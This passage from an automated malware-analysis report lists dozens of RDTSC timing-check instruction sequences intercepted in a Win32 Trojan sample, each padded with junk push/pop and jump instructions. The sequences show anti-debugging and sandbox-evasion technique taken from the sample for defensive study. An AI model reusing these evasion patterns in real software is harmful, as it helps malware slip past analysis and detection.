Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D78DA0 second address: D78DA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D78DA9 second address: D78DAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D78AAF second address: D78ABC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F3620DC90F6h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D81CB5 second address: D81CBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D80463 second address: D80477 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3620DC9100h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D805DF second address: D805E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D805E3 second address: D805ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D805ED second address: D805F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D805F3 second address: D805F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D805F7 second address: D80609 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c jnc 00007F362081F596h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D80609 second address: D8062B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3620DC9106h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D80C2A second address: D80C2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D80C2E second address: D80C34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D80C34 second address: D80C40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D80C40 second address: D80C51 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3620DC90FBh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D80F3F second address: D80F4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F362081F596h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D81993 second address: D81997 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D81997 second address: D8199D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D8199D second address: D819BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F3620DC90F8h 0x0000000c pushad 0x0000000d popad 0x0000000e jnp 00007F3620DC90FCh 0x00000014 jp 00007F3620DC90F6h 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e pushad 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D819BF second address: D819C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D853D3 second address: D85405 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F3620DC90F6h 0x00000008 jmp 00007F3620DC90FBh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 pushad 0x00000011 jno 00007F3620DC9108h 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D85405 second address: D8542B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F362081F5A5h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007F362081F596h 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D8542B second address: D8542F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D88F72 second address: D88F78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D88F78 second address: D88F97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F3620DC9108h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D8966A second address: D89670 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D89670 second address: D89674 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D89674 second address: D8967A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D8967A second address: D89680 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D89680 second address: D89686 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D897C5 second address: D897CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D897CB second address: D897E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F362081F5A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D897E5 second address: D897EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D8F5C9 second address: D8F5D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jl 00007F362081F59Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D8F5D6 second address: D8F5DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D8FB26 second address: D8FB34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F362081F598h 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D8FB34 second address: D8FB3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D8FB3C second address: D8FB40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D8FB40 second address: D8FB71 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F3620DC90F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b jmp 00007F3620DC9103h 0x00000010 pop edi 0x00000011 pop edx 0x00000012 pop eax 0x00000013 jnp 00007F3620DC912Ah 0x00000019 push eax 0x0000001a push edx 0x0000001b je 00007F3620DC90F6h 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D8FB71 second address: D8FB8F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F362081F5A0h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007F362081F596h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D90420 second address: D90424 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D9071F second address: D9073B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F362081F5A7h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D9073B second address: D90759 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F3620DC9109h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D90759 second address: D9078D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jnp 00007F362081F5C2h 0x0000000d ja 00007F362081F59Eh 0x00000013 pushad 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 jmp 00007F362081F5A4h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D90AA8 second address: D90AB2 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3620DC90FEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D90AB2 second address: D90ABC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D90ABC second address: D90AC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D90D79 second address: D90D8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jnl 00007F362081F596h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D91363 second address: D91376 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3620DC90FFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D937BC second address: D937EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edi 0x00000007 jnc 00007F362081F59Eh 0x0000000d popad 0x0000000e push ebx 0x0000000f jmp 00007F362081F5A3h 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D937EC second address: D937F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D9C3F2 second address: D9C3FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F362081F596h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D9C3FD second address: D9C40E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F3620DC90F6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D9B6B8 second address: D9B6BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D9B6BD second address: D9B6DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3620DC9108h 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D9B826 second address: D9B82C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D9B82C second address: D9B858 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3620DC9106h 0x00000009 popad 0x0000000a jns 00007F3620DC90FCh 0x00000010 pushad 0x00000011 push eax 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D9B98E second address: D9B9A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push esi 0x00000008 pushad 0x00000009 popad 0x0000000a pop esi 0x0000000b jl 00007F362081F59Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D9BAC6 second address: D9BACC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D9BC5C second address: D9BC62 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D9BDCD second address: D9BDD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D9BDD3 second address: D9BDD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D9C109 second address: D9C113 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D9F4C2 second address: D9F4DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jg 00007F362081F596h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jl 00007F362081F596h 0x00000017 jnc 00007F362081F596h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D9F4DF second address: D9F4E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D9F4E3 second address: D9F4E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D9F4E9 second address: D9F4FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 push edx 0x0000000a pop edx 0x0000000b jnl 00007F3620DC90F6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D9F4FC second address: D9F501 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D9F501 second address: D9F51C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F3620DC9105h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DA5AF4 second address: DA5B22 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F362081F5A0h 0x00000008 jmp 00007F362081F59Ch 0x0000000d pop esi 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F362081F59Ah 0x00000017 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DA5B22 second address: DA5B27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DA5E09 second address: DA5E50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F362081F5A3h 0x00000009 pop edx 0x0000000a jnl 00007F362081F5B9h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DA5E50 second address: DA5E7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3620DC9102h 0x00000009 jmp 00007F3620DC9105h 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DA63EB second address: DA63F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DA63F1 second address: DA63F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DA63F6 second address: DA643C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jo 00007F362081F596h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f je 00007F362081F596h 0x00000015 jmp 00007F362081F5A7h 0x0000001a pop eax 0x0000001b jnc 00007F362081F5A9h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DA643C second address: DA6446 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F3620DC90FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DA6446 second address: DA645A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F362081F59Dh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DA65AD second address: DA65D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3620DC9107h 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jnl 00007F3620DC90F6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DA65D3 second address: DA65E2 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F362081F596h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DA65E2 second address: DA65F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 js 00007F3620DC90F6h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DA74E9 second address: DA74F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DC0D17 second address: DC0D59 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jo 00007F3620DC90F6h 0x00000009 pop esi 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d jmp 00007F3620DC9102h 0x00000012 push edi 0x00000013 pop edi 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push edx 0x0000001a jmp 00007F3620DC9109h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
